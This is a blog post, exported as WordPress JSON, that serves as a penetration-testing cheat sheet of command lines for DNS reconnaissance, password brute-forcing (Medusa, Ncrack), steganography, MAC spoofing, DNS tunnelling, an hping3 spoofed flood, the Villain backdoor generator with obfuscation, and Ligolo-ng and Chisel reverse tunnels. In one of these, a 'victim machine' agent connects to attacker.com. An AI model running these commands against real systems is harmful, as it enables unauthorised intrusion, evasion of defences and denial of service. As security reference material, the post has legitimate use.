{"id":1838,"date":"2021-04-11T19:51:38","date_gmt":"2021-04-11T19:51:38","guid":{"rendered":"https:\/\/dft.wiki\/?p=1838"},"modified":"2024-03-24T09:42:29","modified_gmt":"2024-03-24T13:42:29","slug":"hacking-tools-cheat-sheet-4","status":"publish","type":"post","link":"https:\/\/dft.wiki\/?p=1838","title":{"rendered":"Hacking Tools Cheat Sheet #4"},"content":{"rendered":"<h5>Reference List<\/h5>\n<ol>\n<li style=\"list-style-type: none;\">\n<ol>\n<li><a href=\"#MassDNS\">MassDNS<\/a><\/li>\n<li><a href=\"#ShuffleDNS\">ShuffleDNS<\/a><\/li>\n<li><a href=\"#DNSProbe\">DNSProbe<\/a><\/li>\n<li><a href=\"#Amass\">Amass<\/a><\/li>\n<li><a href=\"#Jok3r\">Jok3r<\/a><\/li>\n<li><a href=\"#Medusa\">Medusa<\/a><\/li>\n<li><a href=\"#Ncrack\">Ncrack<\/a><\/li>\n<li><a href=\"#SubBrute\">SubBrute<\/a><\/li>\n<li><a href=\"#Steghide\">Steghide<\/a><\/li>\n<li><a href=\"#StegCracker\">StegCracker<\/a><\/li>\n<li><a href=\"#Zsteg\">Zsteg<\/a><\/li>\n<li><a href=\"#Exiv2\">Exiv2<\/a><\/li>\n<li><a href=\"#Binwalk\">Binwalk<\/a><\/li>\n<li><a href=\"#oleVBA\">oleVBA<\/a><\/li>\n<li><a href=\"#MACchanger\">MACchanger<\/a><\/li>\n<li><a href=\"#DNScat\">DNScat2<\/a><\/li>\n<li><a href=\"#Iodine\">Iodine<\/a><\/li>\n<li><a href=\"#hping3\">hping3<\/a><\/li>\n<li><a href=\"#WhatWeb\">WhatWeb<\/a><\/li>\n<li><a href=\"#NetDiscover\">NetDiscover<\/a><\/li>\n<li><a href=\"#NetDiscover\">Zmap<\/a><\/li>\n<li><a href=\"#NetDiscover\">Zgrab<\/a><\/li>\n<li><a href=\"#NetDiscover\">ZDNS<\/a><\/li>\n<li><a href=\"#NetDiscover\">Villain<\/a><\/li>\n<li><a href=\"#dnsTwist\">dnsTwist<\/a><\/li>\n<li><a href=\"#Ligolong\">Ligolo-ng<\/a><\/li>\n<li><a href=\"#Chisel\">Chisel<\/a><\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<hr id=\"MassDNS\" \/>\n<p><strong>MassDNS<\/strong> &#8211; A high-performance DNS stub resolver for massive amounts of domains [<a href=\"https:\/\/github.com\/blechschmidt\/massdns\">Link<\/a>]. In its repository, there is a file with one thousand DNS resolver IPs. See also Subjack: it scans a list of subdomains concurrently and identifies ones that are able to be hijacked [<a href=\"https:\/\/github.com\/haccer\/subjack\">Link<\/a>].<\/p>\n<pre>sudo apt install massdns\r\nmassdns -r resolvers.lst -t A -w results.output domains.lst<\/pre>\n<hr id=\"ShuffleDNS\" \/>\n<p><strong>ShuffleDNS<\/strong> &#8211; It is a tool capable of brute-force domain resolve and handle wildcard subdomains [<a href=\"https:\/\/github.com\/projectdiscovery\/shuffledns\">Link<\/a>].<\/p>\n<pre>GO111MODULE=on go get -v github.com\/projectdiscovery\/shuffledns\/cmd\/shuffledns\r\nwget https:\/\/github.com\/blechschmidt\/massdns\/blob\/master\/lists\/resolvers.txt\r\n~\/go\/bin\/shuffledns -h<\/pre>\n<p>Subdomain Bruteforcing:<\/p>\n<pre>~\/go\/bin\/shuffledns -d example.com -w wordlist.lst -r resolvers.txt -t 200<\/pre>\n<p>To resolve a list of subdomains:<\/p>\n<pre>~\/go\/bin\/shuffledns -d example.com -list subdomains.lst -r resolvers.txt\r\nsubfinder -d example.com -silent | ~\/go\/bin\/shuffledns -d example.com -r resolvers.txt<\/pre>\n<hr id=\"DNSProbe\" \/>\n<p><strong>DNSProbe<\/strong> &#8211; perform multiple DNS queries (A, AAAA, CNAME, TXT, MX) with list of resolvers [<a href=\"https:\/\/github.com\/projectdiscovery\/dnsprobe\">Link<\/a>].<\/p>\n<pre>GO111MODULE=on go get -v github.com\/projectdiscovery\/dnsprobe\r\nsubfinder -d example.com -silent | ~\/go\/bin\/dnsprobe -r <strong>cname<\/strong>\r\nsubfinder -d example.com -silent | ~\/go\/bin\/dnsprobe -r <strong>txt<\/strong>\r\nsubfinder -d example.com -silent | ~\/go\/bin\/dnsprobe -r <strong>mx<\/strong>\r\nsubfinder -d example.com -silent | ~\/go\/bin\/dnsprobe -r <strong>a<\/strong>\r\nsubfinder -d example.com -silent | ~\/go\/bin\/dnsprobe -r <strong>aaaa -silent<\/strong><\/pre>\n<hr id=\"Amass\" \/>\n<p><strong>Amass<\/strong> &#8211; The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques [<a href=\"https:\/\/github.com\/OWASP\/Amass\">Link<\/a>].<\/p>\n<p>FEATURES<\/p>\n<ul>\n<li><strong>DNS:<\/strong> Brute-forcing, rDNS sweeping, NSEC zone walking, Zone transfers, FQDN alterations\/permutations, FQDN Similarity-based Guessing.<\/li>\n<li><strong>Scraping:<\/strong> Ask, Baidu, Bing, BuiltWith, DNSDumpster, HackerOne, IPv4Info, RapidDNS, Riddler, SiteDossier, Yahoo.<\/li>\n<li><strong>Certificates:<\/strong> Active pulls (optional), Censys, CertSpotter, Crtsh, FacebookCT, GoogleCT.<\/li>\n<li><strong>APIs:<\/strong> AlienVault, Anubis, BinaryEdge, BGPView, BufferOver, C99, CIRCL, Cloudflare, CommonCrawl, DNSDB, GitHub, HackerTarget, Mnemonic, NetworksDB, PassiveTotal, Pastebin, RADb, ReconDev, Robtex, SecurityTrails, ShadowServer, Shodan, SonarSearch, Spyse, Sublist3rAPI, TeamCymru, ThreatBook, ThreatCrowd, ThreatMiner, Twitter, Umbrella, URLScan, VirusTotal, WhoisXML, ZETAlytics, ZoomEye.<\/li>\n<li><strong>Web Archives:<\/strong> ArchiveIt, ArchiveToday, Wayback.<\/li>\n<\/ul>\n<pre>sudo apt install amass\r\namass enum -d example.com\r\namass enum -passive -d example.com -src<\/pre>\n<hr id=\"Jok3r\" \/>\n<p><strong>Jok3r<\/strong> &#8211; It is a framework that aids penetration testers for network infrastructure and web security assessments [<a href=\"https:\/\/hub.docker.com\/r\/koutto\/jok3r\/\">Link<\/a>]. It does automatically all the basic work with just a few prompts. Great for a starting point and obvious vulnerabilities.<\/p>\n<p>Installing and executing:<\/p>\n<pre>sudo docker pull koutto\/jok3r\r\nsudo docker run -i -t --name jok3r-container -w \/root\/jok3r -e DISPLAY=$DISPLAY -v \/tmp\/.X11-unix:\/tmp\/.X11-unix --shm-size 2g --net=host koutto\/jok3r<\/pre>\n<p>The final image will be 16.4 GB big \ud83d\ude41<\/p>\n<p>Re-starting or getting a shell:<\/p>\n<pre>sudo docker start -i jok3r-container\r\nsudo docker exec -it jok3r-container bash<\/pre>\n<ul>\n<li>.\/jok3r.py info &#8211;checks http<\/li>\n<li>.\/jok3r.py attack -t https:\/\/example.com\/ &#8211;add2db default<\/li>\n<li>.\/jok3r.py attack -t https:\/\/example.com\/ &#8211;add2db default &#8211;fast<\/li>\n<li>.\/jok3r.py db\n<ul>\n<li>mission -h<\/li>\n<li>hosts<\/li>\n<li>services<\/li>\n<li>products<\/li>\n<li>vulns<\/li>\n<li>vulns &#8211;no-truncation<\/li>\n<li>creds<\/li>\n<li>report<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>To copy the reports to the host machine:<\/p>\n<pre>sudo docker cp jok3r-container:\/root\/jok3r\/reports\/ .<\/pre>\n<hr id=\"Medusa\" \/>\n<p><strong>Medusa<\/strong> &#8211; x [<a href=\"http:\/\/foofus.net\/goons\/jmk\/medusa\/medusa.html\">Link<\/a>].<\/p>\n<pre>medusa -d\r\nmedusa -h 192.168.0.1 -u root -P passwords.txt -e ns -M smbnt\r\nmedusa -H hosts.txt -U users.txt -P passwords.txt -T 20 -t 10 -L -F -M smbnt\r\nmedusa -M smbnt -C combo.txt\r\nmedusa -M smbnt -C combo.txt -H hosts.txt<\/pre>\n<ul>\n<li>-d\n<ul>\n<li>list available modules<\/li>\n<\/ul>\n<\/li>\n<li>-q\n<ul>\n<li>display module usage info<\/li>\n<\/ul>\n<\/li>\n<li>\u00a0-M\n<ul>\n<li>mode<\/li>\n<\/ul>\n<\/li>\n<li>-h\n<ul>\n<li>hostname or IP<\/li>\n<\/ul>\n<\/li>\n<li>-H\n<ul>\n<li>list of hosts<\/li>\n<\/ul>\n<\/li>\n<li>-u\n<ul>\n<li>username<\/li>\n<\/ul>\n<\/li>\n<li>-U\n<ul>\n<li>list of users<\/li>\n<\/ul>\n<\/li>\n<li>-p\n<ul>\n<li>password<\/li>\n<\/ul>\n<\/li>\n<li>-P\n<ul>\n<li>list of passwords<\/li>\n<\/ul>\n<\/li>\n<li>-C\n<ul>\n<li>combo of entries<\/li>\n<\/ul>\n<\/li>\n<li>-e\n<ul>\n<li>additional password checks, <strong>n<\/strong> for no password and <strong>s<\/strong> for password = username<\/li>\n<\/ul>\n<\/li>\n<li>-T\n<ul>\n<li>total number of hosts<\/li>\n<\/ul>\n<\/li>\n<li>-t\n<ul>\n<li>total number of logins<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<hr id=\"Ncrack\" \/>\n<p><strong>Ncrack<\/strong> &#8211; Ncrack is a high-speed network authentication cracking tool developed by the nmap team [<a href=\"https:\/\/nmap.org\/ncrack\/\">Link<\/a>]. The supported protocols include SSH, RDP, FTP, Telnet, HTTP(S), POP3(S), IMAP, SMB, VNC, SIP, Redis, PostgreSQL, MySQL, MSSQL, MongoDB, Cassandra, WinRM, and OWA.<\/p>\n<pre>ncrack --user root -p ssh -P passwords.txt 10.10.10.10\r\nncrack -u root -p 22 -P passwords.txt -T5 10.10.10.10\r\nncrack -u root -p 21 -P passwords.txt -T 5 10.10.10.10\r\nncrack -u root -p 21 -P passwords.txt 10.10.10.10\r\nncrack -u root -p 3389 -P passwords.txt 10.10.10.10<\/pre>\n<hr id=\"SubBrute\" \/>\n<p><strong>SubBrute<\/strong> &#8211; Brute force app to discover subdomains [<a href=\"https:\/\/github.com\/TheRook\/subbrute\">Link<\/a>].<\/p>\n<pre>.\/subbrute.py example.com\r\n.\/subbrute.py onedomain.com anotherdomain.com\r\n.\/subbrute.py example.com &gt; output.txt\r\n.\/subbrute.py -t domainslist.txt<\/pre>\n<hr id=\"Steghide\" \/>\n<p><strong>Steghide<\/strong> &#8211; A steganography tool that hides data in some of the least significant bits of pictures (.jpg, .bmp) or audio (.wav, .au) files [<a href=\"Steghide https:\/\/salsa.debian.org\/pkg-security-team\/steghide\">Link<\/a>].<\/p>\n<pre>sudo apt install steghide steghide-doc -y\r\nsteghide info fileName\r\nsteghide embed -cf image.jpg -ef secret.txt -v\r\nsteghide extract -sf image.jpg\r\nsteghide embed -cf audio.wav -ef secret.txt -p password\r\nsteghide --encinfo\r\nsteghide embed -cf image.bmp -ef secret.txt -e des<\/pre>\n<hr id=\"StegCracker\" \/>\n<p><strong>StegCracker<\/strong> &#8211; Steganography brute-force utility to uncover hidden data inside files [<a href=\"https:\/\/github.com\/Paradoxis\/StegCracker\">Link<\/a>].<\/p>\n<pre>pip3 install stegcracker\r\nstegcracker fileName \/path\/wordlist.txt<\/pre>\n<hr id=\"Zsteg\" \/>\n<p><strong>Zsteg<\/strong> &#8211; A tool that can detect hidden data in .png and .bmp files. [<a href=\"https:\/\/github.com\/zed-0xff\/zsteg\">Link<\/a>].<\/p>\n<pre>gem install zsteg\r\nzsteg fileName\r\nzsteg -a fileName\r\nzsteg -E \"b8,rgb,lsb,xy\" fileName &gt; extracted.exe<\/pre>\n<hr id=\"Exiv2\" \/>\n<p><strong>Exiv2<\/strong> &#8211; A command-line utility to read, write, delete and modify Exif, IPTC, XMP, and ICC image metadata [<a href=\"https:\/\/github.com\/Exiv2\/exiv2\">Link<\/a>]. Official website [<a href=\"https:\/\/www.exiv2.org\/\">Link<\/a>].<\/p>\n<pre>sudo apt install exiv2 -y\r\nexiv2 fileName<\/pre>\n<hr id=\"Binwalk\" \/>\n<p><strong>Binwalk<\/strong> &#8211; A tool for analyzing, reverse engineering, and extracting firmware images [<a href=\"https:\/\/github.com\/ReFirmLabs\/binwalk\">Link<\/a>].<\/p>\n<pre>sudo apt install binwalk -y\r\nbinwalk fileName\r\nbinwalk -e fileName<\/pre>\n<hr id=\"oleVBA\" \/>\n<p><strong>oleVBA<\/strong> &#8211; A script to parse OLE and OpenXML files such as MS Office documents, to extract VBA Macro code [<a href=\"https:\/\/github.com\/decalage2\/oletools\/blob\/master\/oletools\/olevba.py\">Link<\/a>].<\/p>\n<pre>olevba3 fileName.doc\r\nolevba3 fileName.xls<\/pre>\n<p>After extracting the VBA code from a document, you can use a web tool such as OnlineGDB [<a href=\"http:\/\/www.onlinegdb.com\">Link<\/a>] to compile and run the code safely.<\/p>\n<hr id=\"MACchanger\" \/>\n<p><strong>MACchanger<\/strong> &#8211; An utility that makes the manipulation of MAC addresses of network interfaces easier [<a href=\"https:\/\/github.com\/alobbs\/macchanger\">Link<\/a>].<\/p>\n<pre>sudo apt install macchanger -y\r\nmacchanger -h\r\nmacchanger -s eth0\r\nsudo ifconfig eth0 down\r\nsudo macchanger -r eth0\r\nsudo ifconfig eth0 up\r\nmacchanger -s eth0<\/pre>\n<p>Spoof a known MAC address vendor:<\/p>\n<pre>macchanger -l\r\nmacchanger -m 00:00:17:22:22:22 eth0<\/pre>\n<p>Alternatively:<\/p>\n<pre>sudo ifconfig eth0 down\r\nsudo ifconfig wlan1 hw ether 00:00:17:22:22:22\r\nsudo ifconfig eth0 up\r\nifconfig -a<\/pre>\n<hr id=\"DNScat\" \/>\n<p><b>DNScat2<\/b> &#8211; Designed to create an encrypted client-server channel over the DNS protocol (DNS Tunneling) [<a href=\"https:\/\/github.com\/iagox86\/dnscat2\">Link<\/a>] [<a href=\"https:\/\/gitlab.com\/kalilinux\/packages\/dnscat2\">Link<\/a>]. It is capable of multiple TCP tunnels for SSH and HTTP, for example. This is a good solution for C2 of malware and botnets and it requires a lot of workarounds to work properly. I recommend and prefer Iodine instead.<\/p>\n<pre>sudo apt install dnscat2 -y\r\n\r\nOR\r\n\r\nsudo apt install dnscat2-server -y\r\nsudo apt install dnscat2-client -y<\/pre>\n<p><strong>Client<\/strong><\/p>\n<pre>dnscat -h\r\ndnscat domain.com\r\ndnscat --dns domain=domain.com\r\ndnscat --dns domain=domain.com,server=8.8.8.8,port=53\r\ndnscat --dns domain=domain.com,port=53 --no-cache\r\ndnscat --dns domain=domain.com,port=8053,type=A,CNAME<\/pre>\n<p>Using an established <strong>session<\/strong>:<\/p>\n<pre>session -i 12345\r\nhelp\r\nexec -h\r\nshell<\/pre>\n<p><strong>Server<\/strong><\/p>\n<pre>dnscat2-server -h\r\ndnscat2-server\r\ndnscat2-server domain.com\r\ndnscat2-server domain1.com domain2.net\r\ndnscat2-server --dns 'host=127.0.0.1,port=53,domain=domain1.com,domain=domain2.com'<\/pre>\n<hr id=\"Iodine\" \/>\n<p><b>Iodine<\/b> &#8211; Tunnels IPv4 traffic (TCP\/UDP\/ICMP) through DNS by creating a logical network interface on the clients and connecting them (up to 16) as a private network [<a href=\"https:\/\/github.com\/yarrick\/iodine\">Link<\/a>] [<a href=\"https:\/\/code.kryo.se\/iodine\/\">Link<\/a>]. This is high performance and very flexible piece of software for DNS Tunneling but <strong>does not offer encryption<\/strong>. It can also be used with a VPN.<\/p>\n<pre>sudo apt install iodine -y\r\niodine -h<\/pre>\n<p><strong>Server<\/strong><\/p>\n<p>Configure your domain with the following entries:<\/p>\n<pre>iodine    IN NS iodine-ns.domain.com.\r\niodine-ns IN A  200.200.200.200\r\n\r\nOR\r\n\r\niodine    IN NS subdomain.duckdns.org.<\/pre>\n<p>Configure the server to route traffic from the Iodine network to the network interface that has internet access (in my case <code>enp0s3<\/code>):<\/p>\n<pre>sudo sysctl -w net.ipv4.ip_forward=1\r\nsudo iptables -t nat -A POSTROUTING -o <strong>enp0s3<\/strong> -j MASQUERADE\r\nsudo iptables -t filter -A FORWARD -i <strong>enp0s3<\/strong> -o dns0 -m state --state RELATED,ESTABLISHED -j ACCEPT\r\nsudo iptables -t filter -A FORWARD -i dns0 -o <strong>enp0s3<\/strong> -j ACCEPT<\/pre>\n<p>Then start the service:<\/p>\n<pre>sudo iodined -f -P password 10.0.0.1 iodine.domain.com<\/pre>\n<p>If you do not specify a password on the command to run the application it will prompt you for a password.<\/p>\n<p>The argument <code>-f<\/code> is for keeping it running in the foreground to allow for troubleshooting during testings.<\/p>\n<p>Note that a new network interface will be created with the name <code>dns0<\/code>.<\/p>\n<p><strong>Client<\/strong><\/p>\n<pre>sudo iodine -f -P password iodine.domain.com<\/pre>\n<p>This setup will use the present DNS server of the client&#8217;s network as the route for the packets. It is the way to go when the network restricts DNS traffic (port 53) only from the local trusted DNS server. This is how a captive portal can be bypassed.<\/p>\n<p>For direct access to the Iodine server, make changes to the <code>\/etc\/resolve.conf<\/code> accordingly:<\/p>\n<pre>nameserver 200.200.200.200<\/pre>\n<p>Then you can route all your traffic through the Iodine network interface (<code>dns0<\/code>):<\/p>\n<pre>sudo route add -net 0.0.0.0\/0 gw 10.0.0.1 dns0\r\n\r\nOR\r\n\r\nsudo ip route add default via 10.0.0.1 dev dns0<\/pre>\n<hr id=\"hping3\" \/>\n<p><strong>hping3<\/strong> &#8211; A command-line oriented packet assembler and analyzer. It supports TCP, UDP, ICMP, and RAW-IP protocols. This tools can be used for firewall and network testing, port scanning, fingerprinting, auditing, DoS\/DDoS attacks, etc. Available at [<a href=\"https:\/\/salsa.debian.org\/debian\/hping3\">Link<\/a>] and [<a href=\"http:\/\/www.hping.org\/\">Link<\/a>].<\/p>\n<pre>sudo apt install hping3 -y\r\nhping3 --help\r\nsudo hping3 -S 10.1.1.1\r\nsudo hping3 -S 10.1.1.1 -p 8080\r\nsudo hping3 -S 10.1.1.1 -p 8080 -c 10\r\nsudo hping3 --scan 80-90,400-500 -A 10.1.1.1\r\nsudo hping3 -1 10.1.1.x --rand-dest \u2013I eth0\r\nsudo hping3 -9 10.1.1.10 -V\r\nsudo hping3 -S 10.1.1.1 -a 192.168.1.1 -p 443 --flood -I tun0<\/pre>\n<p><strong>Modes<\/strong><\/p>\n<ul>\n<li>default mode\n<ul>\n<li>TCP mode.<\/li>\n<\/ul>\n<\/li>\n<li>-0 &#8211;rawip\n<ul>\n<li>RAW IP mode.<\/li>\n<\/ul>\n<\/li>\n<li>-1 &#8211;icmp\n<ul>\n<li>ICMP mode.<\/li>\n<\/ul>\n<\/li>\n<li>-2 &#8211;udp\n<ul>\n<li>UDP mode.<\/li>\n<\/ul>\n<\/li>\n<li>-8 &#8211;scan\n<ul>\n<li>SCAN mode.<\/li>\n<\/ul>\n<\/li>\n<li>-9 &#8211;listen\n<ul>\n<li>listening mode.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<hr id=\"WhatWeb\" \/>\n<p><strong>WhatWeb<\/strong> &#8211; It is a web scanner that identifies the technology stack that powers a website, such as web service, framework, language, etc [<a href=\"https:\/\/morningstarsecurity.com\/research\/whatweb\">Link<\/a>].<\/p>\n<pre>whatweb https:\/\/example.com<\/pre>\n<hr id=\"NetDiscover\" \/>\n<p><strong>NetDiscover<\/strong> &#8211; Active\/passive ARP reconnaissance tool [<a href=\"https:\/\/github.com\/netdiscover-scanner\/netdiscover\">Link<\/a>].<\/p>\n<pre>netdiscover -h\r\nsudo netdiscover -r 192.168.1.0\/24\r\nsudo netdiscover -p\r\nsudo netdiscover -i eth0\r\nsudo netdiscover -i eth0 -P -N\r\n<\/pre>\n<p><strong>Note:<\/strong> use the <strong>-P<\/strong> and <strong>-N<\/strong> if needed to pipe the output in another application. It will print in text format without headers. TO be stealthy scan in passive mode with <strong>-p<\/strong>. It will only sniff and not send any message, that could announce its presence and scanning to IDS\/IPS.<\/p>\n<hr id=\"Zmap\" \/>\n<p><strong>Zmap<\/strong> &#8211; Zmap<\/p>\n<hr id=\"Zgrab\" \/>\n<p><strong>Zgrab<\/strong> &#8211; Zgrab<\/p>\n<hr id=\"ZDNS\" \/>\n<p><strong>ZDNS<\/strong> &#8211; ZDNS<\/p>\n<hr id=\"Villain\" \/>\n<p><strong>Villain<\/strong> &#8211; a backdoor generator and multi-session handler for Windows and Linux [<a href=\"https:\/\/github.com\/t3l3machus\/Villain\">Link<\/a>]. It allows collaborative engagement by connecting encryptedly sibling servers in order to share sessions under same\/multi segments of network.<\/p>\n<pre>git clone https:\/\/github.com\/t3l3machus\/Villain\r\ncd .\/Villain\r\npip3 install -r requirements.txt\r\nsudo Villain.py [-h] [-p PORT] [-x HOAX_PORT] [-c CERTFILE] [-k KEYFILE] [-u] [-q]<\/pre>\n<p>Commands<\/p>\n<ul>\n<li>help\n<ul>\n<li>Shows commands and usage information.<\/li>\n<\/ul>\n<\/li>\n<li>generate os=windows lhost=eth0\n<ul>\n<li>Generates a payload for Windows that will connect back to the IP of the network interface specified (eth0 for instance).<\/li>\n<\/ul>\n<\/li>\n<li>generate os=windows lhost=eth0 obfuscate\n<ul>\n<li>Same as above but with obfuscating of the code to avoid operating system&#8217;s defenses.<\/li>\n<\/ul>\n<\/li>\n<li>sessions\n<ul>\n<li>lists active sessions<\/li>\n<\/ul>\n<\/li>\n<li>shell 897df98-7a897f0a-98d7f98\n<ul>\n<li>Connects to a session with by Session ID.<\/li>\n<\/ul>\n<\/li>\n<li>exec ~\/script.ps1 897df98-7a897f0a-98d7f98\n<ul>\n<li>Executes a Power Shell script against a Windows session.<\/li>\n<\/ul>\n<\/li>\n<li>connect 192.168.111.111\n<ul>\n<li>Connects to another server instance. It requires approving the connection in less than 10 seconds.<\/li>\n<\/ul>\n<\/li>\n<li>siblings\n<ul>\n<li>Lists the connected sibling servers.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<hr id=\"dnsTwist\" \/>\n<p><strong>dnsTwist<\/strong> &#8211; A fuzzer for finding existent domain typo-squatting candidates [<a href=\"https:\/\/github.com\/elceef\/dnstwist\">Link<\/a>].<\/p>\n<pre>sudo apt install dnstwist -y\r\ndnstwist -r domain.com<\/pre>\n<hr id=\"Ligolong\" \/>\n<p><strong>Ligolo-ng<\/strong> &#8211; It is a reverse VPN connection for pivoting (lateral movement) in a pentest engagement written in Go [<a href=\"https:\/\/github.com\/nicocha30\/ligolo-ng\">Link<\/a>]. The attacker machine is actually the server that will receive a connection back from an internal network that probably sits behind a NAT. The communication is encrypted with TLS and hard to be distinguished from regular web navigation traffic. It creates a tunnel interface in user land and is also compatible with IPv6.<\/p>\n<p><strong>From the attacker machine &#8211; Server<\/strong><\/p>\n<pre>go build -o proxy cmd\/proxy\/main.go\r\nsudo ip tuntap add user $(whoami) mode tun ligolo\r\nsudo ip link set ligolo up\r\nsudo ufw allow 80,443\/tcp\r\n.\/proxy -autocert -laddr 0.0.0.0:443\r\nsudo ip route add 10.0.0.0\/24 dev ligolo<\/pre>\n<p><strong>Note:<\/strong> this will automatically issue Let&#8217;s Encrypt certificates for Internet facing infrastructure or to appear to be legitimate on monitored networks. Optionally, <code>-selfcert<\/code>, can be used to skip this requirement, then on the agent the argument <code>-ignore-cert<\/code> will be necessary to skip verification. Optionally a list of accepted domains can be passed <code>-allow-domains<\/code>. Port 80 needs to be open for satisfying Let&#8217;s Encrypt challenges.<\/p>\n<p><strong>From the victim machine &#8211; Client \/ Agent<\/strong><\/p>\n<pre>go build -o agent cmd\/agent\/main.go\r\n.\/agent -connect attacker.com:443<\/pre>\n<p><strong>Operating<\/strong><\/p>\n<p>Up on the connection is established, on the C2 (server-side) use the following command accordingly.<\/p>\n<pre>&gt;&gt; session\r\n&gt;&gt; ifconfig \r\n&gt;&gt; listener_list \r\n&gt;&gt; start\r\n&gt;&gt; stop<\/pre>\n<hr id=\"Chisel\" \/>\n<p><strong>Chisel<\/strong> is a single executable including both client and server written in Go and feature tunnel traffic over HTTP making is stealth in monitored networks [<a href=\"https:\/\/github.com\/jpillora\/chisel\">Link<\/a>]. It allow multiple tunnels simultaneously and TLS (HTTPS) that is automatically issues from Let&#8217;s Encrypt.<\/p>\n<pre>sudo apt install chisel -y\r\n<\/pre>\n<p>OR<\/p>\n<pre>$ go install github.com\/jpillora\/chisel@latest<\/pre>\n<p>On the attacker side: Server<\/p>\n<pre>chisel server -p 80 --reverse\r\nchisel server -p 443 --reverse --tls-domain example.com<\/pre>\n<p>On the pivot side: Client<\/p>\n<pre>chisel client 200.200.200.200:80 R:socks\r\nchisel client https:\/\/200.200.200.200:443 R:0.0.0.0:1080:socks<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Reference List MassDNS ShuffleDNS DNSProbe Amass Jok3r Medusa Ncrack SubBrute Steghide StegCracker Zsteg Exiv2 Binwalk [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-1838","post","type-post","status-publish","format-standard","hentry","category-hacking"],"_links":{"self":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/1838","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1838"}],"version-history":[{"count":38,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/1838\/revisions"}],"predecessor-version":[{"id":3963,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/1838\/revisions\/3963"}],"wp:attachment":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1838"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1838"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1838"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}